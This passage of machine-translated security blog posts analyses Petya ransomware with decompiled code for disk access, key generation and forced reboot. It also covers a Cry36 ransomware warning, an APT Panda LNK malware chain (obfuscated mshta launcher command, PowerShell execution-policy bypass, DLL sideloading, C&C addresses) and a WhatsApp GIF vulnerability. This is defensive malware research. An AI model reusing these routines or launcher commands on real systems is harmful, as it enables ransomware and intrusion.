  v5 = (CHAR *)sub_239090(v2);
  if ( !GetSystemDirectoryA(v5, v3) )
    return 0;
  *(_DWORD *)FileName = 1546542172;
  v9 = *v5;
  v10 = 58;
  sub_239070(v5);
  v6 = CreateFileA(FileName, 0, 3u, 0, 3u, 0, 0);
  if ( v6 == (HANDLE)-1 )
  {
    CloseHandle((HANDLE)0xFFFFFFFF);
    return 0;
  }
  DeviceIoControl(v6, 0x560000u, 0, 0, &OutBuffer, 0x20u, &BytesReturned, 0);
  // In because 0x560000 is IoControlCode, it was changed to 0x70048, 0x70000 in the future to remove information in dia  
  CloseHandle(v6);
  qmemcpy(v1, "\\\\.\\PhysicalDrive", 17);
  v1[17] = v12 + 48;
  v1[18] = 0;
  return 1;

Ransomware then creates a buffer containing the ransom link "hxxp: // petya5koahtsf7sv [.] Onion / [Random]", "hxxp: // petya37h5tbhyvki [.] Onion / [Random]" Ransom Note. And call the CryptGenRandom function to generate the victim's private key.

  v4 = (_DWORD *)phProv;
  *(_DWORD *)phProv = 0;
  if ( !CryptAcquireContextA(&phProv, 0, 0, 1u, 0xF0000000) )
    return -60;
  if ( !CryptGenRandom(phProv, dwLen, pbBuffer) )
    return -60;
  CryptReleaseContext(phProv, 0);
  *v4 = dwLen;
  return 0;

After the payload, ransomware uses NtRaiseHardError to force the computer to reboot

v0 = GetCurrentProcess();
  if ( !OpenProcessToken(v0, 0x28u, &TokenHandle) )
    return 0;
  LookupPrivilegeValueA(0, "SeShutdownPrivilege", (PLUID)Newstate.Privileges);
  Newstate.PrivilegeCount = 1;
  Newstate.Privileges[0].Attributes = 2;
  AdjustTokenPrivileges(TokenHandle, 0, &Newstate, 0, 0, 0);
  if ( GetLastError() )
    return 0;
  v2 = GetModuleHandleA("NTDLL.DLL");
  v3 = GetProcAddress(v2, "NtRaiseHardError");
  ((void (__cdecl *)(signed int, _DWORD, _DWORD, _DWORD, signed int, char *))v3)(-1073740976, 0, 0, 0, 6, &v5);
  return 1;

Stage 2: Low level

Now we analyze the malicious code inserted into the MBR of the drive:

From the dump result from \. \ PhysicalDrive0 we have:

  • Sector 0: The first bootloader's unique score
  • Sector 1-33: This is all 0x37
  • Sector 34-49: The kernel segment of ransomware
  • Sector 50-53: Blank
  • Sector 54: Nonce, CNC and Personal Key
  • Sector 55-56: Data is encrypted

When the machine starts, the ransomware code will be executed:

To read the drive sector, it uses interrupt 13

Next, Ransomware will check if the MBR is encrypted?

If not encrypted, Petya uses Salsa20 algorithm to lock MFT.

MFT (Master File Table) is the most important component in the NTFS system. MFT contains information about all files and directories in the logical drive.

After the encryption is complete, the main screen will be displayed

When the user enters the Petya key, he will check the format of the key:

  • Has a length of 16 bytes
  • Only the following characters are accepted 123456789abcdefghijkmnopqrstuvwxABCDEFGHJKLMNPQRSTUVWX

Although, it is possible to bypass check_key by changing the address of some jump functions but that does not decode MFT. However, due to the size limitations of the sectors, Petya ransomware does not fully implement the Salsa 20 algorithm, so we can brute force the decryption key.

In Petya's decoding process we see:

  • Petya loads up the 512-byte memory of the 55th sector (this is the data to be decoded)
  • Petya loads 8 byte memory at offset 0x6c21 right before CNC in the 54th sector (this is nonce)

We have the code and the nonce. You can read salsa's algorithm and write brute force script yourself or use a golang script written by a very nice guy leo-stone.

summary

Creating a ransomware launched in boot sector, MBR and MFT encryption is a very interesting direction. However, deploying ransomware under the kernel layer has created several vulnerabilities while implementing the encryption algorithm so that we can decode without a key. This has made Petya the first version of the body non-contagious. However, malicious code such as Petya, such as Goldeneye, has inspired hackers to develop ransomware to attack the kernel layer, posing a challenge for the security house.

CẢNH BÁO RANSOMWARE CRY36/NEMESIS ĐANG LÂY LAN RỘNG RÃI
06 Nov

CMC Cyber Sercurity malware analysts have reported that at least 4 units infected with Ransomware Cry36 / Nemesis all user data (except for files that may cause operating system errors) are encrypted and Change the extension to ". [id] _WECANHELP".

The ransomware model has the extension ". [Id] _WECANHELP" which is the latest variant of Cry36 / Nemesis that was first discovered on August 9, 2019. When it infects the victim's computer, it quickly scans all drive partitions and shared partitions to identify user data and ignores executable files and system files. Finally, the ransomware encrypts data, and in each folder it encrypts, a file containing information that the victim can conteacts with the attacker and the victim's ID is left behind. Variants of Cry36 / Nemesis are usually sent to the victim's computer via poorly secured RDP ports, spam emails or pretend to be software that trick users into downloading.

Currently, there is no effective method to break the code of Cry36 / Nemesis. However, the victims were never paid a ransom for the attacker. There have been many cases recorded, after paying the ransom victims also failed to decode the data or the decoded data was faulty. At the same time, paying the attacker will wake him up again.

To prevent the risk of becoming a victim of Cry36 / Nemesis, users should disconnect RDP service ports if not needed, set up firewall rules to restrict users, remote access to server, ensure the origin of the software, email before opening.

CMC CYBER SECURITY PHÂN TÍCH MẪU MALWARE DẠNG LNK CỦA NHÓM APT PANDA
31 Oct

Recently, CMC CyberSecurity received a number of malicious samples believed to be developed by Panda hackers. In order to attack APT to foreign government organizations, including Vietnamese organizations.

Samples received after analysis can be divided into two types. Each type uses a different payload implementation but still has some common characteristics:

  • Use the .lnk shortcut file with the .doc extension (eg sample.doc.lnk) to deceive the user.
  • The lnk file attached to the hta file can execute vbscript.
  • Script to open the attached document file for the user and implicitly execute the payload.

Based on the content of document files prepared to deceive users, it can be surmised that the target that the attacker wants to target is users of some units of the Vietnamese government.

   1. Technical analysis

  1.1. Analysis of file type lnk 1

File LNK

The sample file is a shortcut file with the extension .lnk, usually named with the .doc extension to deceive users because the .lnk extension will be hidden by Windows. The suspicious point is in the target part of the shortcut file. Usually, the target of the shortcut usually points to a destination folder or file. However, the target of the templates all contain the following command:

%comspec% / c for %x in (%temp% = %) do for / f "delims ==" %i in ('dir "%x \ GIAYMOI.doc.lnk" / s / b') do start m%windir: ~ -1,11 exe "%i"

The above code was obfuscate by using the variable %comspec% instead of directly calling the string "cmd.exe" and the "s" in the file name mshta.exe was obtained by cutting the last character of the value contained in variable "%windir%" (usually C: \ Windows).

Mshta.exe is a microsoft application developed to take advantage of fast application building through html, css, vbscript, javascript. Using mshta and the .hta file format, we can open an html page as an application. The hta file format is the same as the html file. By adding tags into the card of the html file we have the hta file that can be opened via the mshta application.

The hta file can be inserted before its header. Take advantage of this,

the attacker has inserted an lnk file before it, with the command opening itself with mshta.exe to execute the embedded hta file. When the user opens the lnk file, will execute the command in the target of the lnk file and execute the mshta.exe file to open itself.

File HTA

By default, mshta.exe can execute both javascript and vbscript embedded in hta files using related dlls. The hta file that is embedded when opened will have the following properties: minimize, not shown on the taskbar, no menu and caption. Its sole task is to execute malicious vbscript code.

The vbscript script has been obfuscate (confusing) to make the analysis process difficult. After deobfuscate, you can see that the code snippet contains 1 data in binary form.

Then, the code uses the ADODB object to save the binary data as a file into the %temp% folder named 3.ps1.

Finally, execute the file 3.ps1 with the command line

powershell.exe -exec bypass -file & szTempPath, Null, Instance, MWcWurrkfEbtfWdZTY

3.ps1

The powershell script continues to be confused by using base64 to encode its entire contents. After decode the entire content, the script will continue to run through powershell's iex function.

The content after the script decode is also messed up to make its content more difficult to understand. After analysis, we can get a general overview of the content and tasks of the code as follows:

  • The code checks the Administrator rights of the current user and stores the result in a variable.
  • Proceed to decode the .doc file as base64 and save it to the directory %temp%. Then open this file for the user.
  • If the script is run with Administrator privileges, the .dat file will be saved in the "%windir% \ debug" directory. Otherwise, the %temp% folder will be used to save the .dat file.
  • The InstallUtil tool (v2.0 or 4.0) will be used as a loader to execute the .dat payload file. When having Administrator rights, the script will copy 2 InstallUtil.exe and schtasks.exe windows files into %temp% folder. Particularly, the file schtasks.exe (microsoft utility used to schedule automatic running of some programs and tasks 1) will be renamed to "wtask.exe".
  • Then use cmd to execute the wtask.exe file to run automatically, with the purpose of loading the executable file loader to run the .dat file with SYSTEM privileges.
  • Without Administrator rights, the loader will be executed indirectly through vbscript. The code also checks and adjusts how it executes accordingly when it detects an antivirus product installed on the computer.
  • After executing the process "wtask.exe" will create an entry in Task Scheduler to execute

Final Payload

InstallUtil.exe when loading payload file tmp_FlVnNI.dat will continue decode a shellcode in base64 format and copy the decoded part into a allocated memory with the attribute PAGE_EXECUTE_READWRITE and create a thread to execute shellcode.

Shellcode will automatically decode part of its code using the xor algorithm with the key of 0x44. After decoding 0xcf2 bytes, shellcode will execute the decoded part.

This is the final payload to make the connection to the attacker's server. Currently unable to connect to this server.

Analysis of file type lnk 2

First stage

Similar to type 1, type 2 is also an lnk file embedded before the hta file. At the time of vbscript execution, this script decodes and stores into %temp% folder 3 binary files in base64 and 1 document file.

The document file will then be opened for the user.

Meanwhile, the script will execute the 3.exe file to perform malicious actions.

Second stage

3.exe executable file is actually a clean file, but it will load a modified DLL file containing malicious code.

To do this, the attacker only needs to find a dll loaded by the LoadLibrary function in the 3.exe file (in this case http_dll.dll), then create a malicious dll file with the same name as the parameter of the LoadLibrary function. and put it in the same directory as the 3.exe file. When calling LoadLibrary, 3.exe will find the dll in the same directory first and load it up.

When uploaded, http_dll.dll will find the VirtualProtect function to modify the attribute of the 16 bytes of memory the module has loaded it at RVA of 0x157a to PAGE_EXECUTE_READWRITE. In this case, the corrected location will be the command jz 0x401533.

To perform malicious behavior, the command jz 0x401533 will be replaced with 3 push commands FFFFFFFF, push http_dll.10001230 and "ret" command to redirect the program 3.exe to sub_10001230 of the dll, then the program will leave for 3.exe to continue execution.

At sub_10001230, the malicious code will read the file http_dll.dat in the same directory. The content at the beginning of this dat file is a string with null-terminated and data. This string will be used to be the decryption key for the data portion of the dat file.

After that, the malicious code will create a new memory area to contain the decryption process conducted by the xor algorithm with the string key in the dat file as above.

The malware continues to change the properties of this new device with the PAGE_EXECUTE_READWRITE property and execute shellcode at this address.

The decoded content is a RAW PE file, but it has been cleverly integrated into a shellcode, starting from offset 0. This shellcode serves as a loader, load this raw PE file to be able to execute OK.

First, shellcode finds the address of kernel32.dll and then loads the functions LoadLibray, GetProcAddress, ZwFlushIntructionCache, VirtualAlloc by comparing the hash of the names of the functions that are exported by kernel32.

Then, Loader reads the header of the PE file, maps the sections to the corresponding memory areas, reallocates some addresses and resolves the Import Address Table of the file. Once completed, the program execution flow will be passed to the DllMain function of this PE file.

Final Payload

Here, the malicious code will take a number of paths to use, then decrypt a data section to use.

The decoding result is a number of strings including autorun key name, ip c & c server.

Then the malicious code will perform the following behaviors:

  • Make a copy of the three executable files to the user's profile directory or alluserprofile if there are sufficient administrator rights.
  • Add and lock autorun to activate the executable file which has just been dropped when restarting. Also relaunch itself if this is its first run. The malware distinguishes this by inserting another parameter to it at subsequent runs.
  • Create a mutex, connect to the server to receive commands from the server.
    • Creating a backdoor allows an attacker to execute commands remotely.
    • Support many different commands including upload file, folder, list folder, read file, get computer information, user, ...

Conclude

By using various attack and disruptive techniques during execution, it is shown that the person behind the malware development has invested a lot of time in researching the target and developing the attack method accordingly. . APT is a malicious attack, carefully invested to steal important information and cause damage to the organization. To prevent APT attacks, always prepare new precautions and ongoing monitoring to ensure the security of users and organizations as well.

C&C ip, domain

185.239.226.19

185.239.226.61

43.254.217.67

167.88.178.24

www.yahoorealtors.com

yahoorealtors.com

web.officeproduces.com

web.officeproduces.com

up.officeproduces.com

we.officeproduces.com

download.officeproduces.com

aridndvn.ccom

Infosecvn.com

CHỈ CẨN MỞ MỘT HÌNH ẢNH BÌNH THƯỜNG, ĐIỆN THOẠI CỦA BẠN ĐÃ CÓ THỂ BỊ “HACK”
30 Oct

Today, short clips, GIFs are everywhere on social media, on message boards, on chats, helping users to perfectly express their emotions, making it possible for people to Have fun, relax and highlight the meaning of the conversation. But what if a GIF greeting looks innocent with a message Good morning, Happy Birthday or Merry Christmas "hack" the phone in your hand?

The WhatsApp app (a cross-platform messaging app) recently patched an important security hole in its Android app, which has been patched since it was discovered three months after being discovered. and if exploited, can allow hackers to gain access to Android devices and potentially steal the files and resources on the device, and more seriously, chat messages or accounts of other applications have on the victim machine.

WhatsApp Remote Code Execution Vulnerability

The vulnerability, publicized with the ID CVE-2019-11932, is a "double-free" vulnerability, which simply means calling the free function twice when using HEAP dynamic memory in C. This flaw is not included in the source code. of the WhatsApp application that is in the open source library that WhatsApp uses to process photos.

Discovered by Vietnamese security researcher Pham Hong Nhat in May this year, this vulnerability led to remote code execution attacks (RCE), allowing attackers to execute arbitrary code on Mobile devices that use WhatsApp.

“Payload (exploit code) is executed in the WhatsApp context. Therefore, it has the right to read SDCard and access the WhatsApp message database, ”the author answered in an interview with Thehackernews.

“The malicious code will have all the rights that WhatsApp has, including recording, accessing the camera, accessing the file system, as well as WhatsApp's sandbox files including messaging facilities, and chats. protection by application, etc.

How does this flaw work?

WhatsApp uses a parsing library to create a preview of GIF files when users open their device before sending them to friends or family.

So this flaw can not "Activate" by sending a malicious GIF file to the victim. Instead, it is triggered when the victim selects the WhatsApp Gallery Picker library and sends these photos to others.

Readers can view PoC here:

To exploit this vulnerability, all an attacker needs to do is send a manually created malicious GIF (insert malicious code) to Android users via any online channel and wait for the user to open the image gallery. Photos in WhatsApp.

However, if an attacker wants to send a GIF file to a victim via any messaging platform like WhatsApp or Messenger, they need to send that file as a document instead of a media attachment, because when compressed Images used by these services will falsify malicious code hidden in the image.

The application version has vulnerabilities, and patches

The flaw affects versions of the WhatsApp 2.19.230 app and earlier versions running on Android 8.1 and 9.0 operating systems, which do not exist with Android OS 8.0 and below.

"In older versions of Android, the" double-free "flaw could still be affected. However, because malloc is called by the system after calling free functions, the application can only be exploited when I control the registers on the PC, "the researcher wrote.

Author Pham Hong Nhat told The Hacker News that he reported the vulnerability to Facebook, the owner of WhatsApp, in late July of this year, and the company developed a security patch in WhatsApp version 2.19.244. , released in September.

Therefore, in order to protect your device against all risks from this vulnerability, you should update WhatsApp to the latest version from the Google Play Store as soon as possible.

In addition, due to the vulnerability in the open source library, it is also possible that any other Android application using the same affected library could be vulnerable to the same attack. The effect, which is Android GIF Drawable, has also released version 1.2.18 of the software to patch this "double-free" flaw.

WhatsApp for iOS is not affected by this vulnerability.

We will have a technical analysis of this vulnerability, invite readers to watch and watch.

Source: Thehackernews.com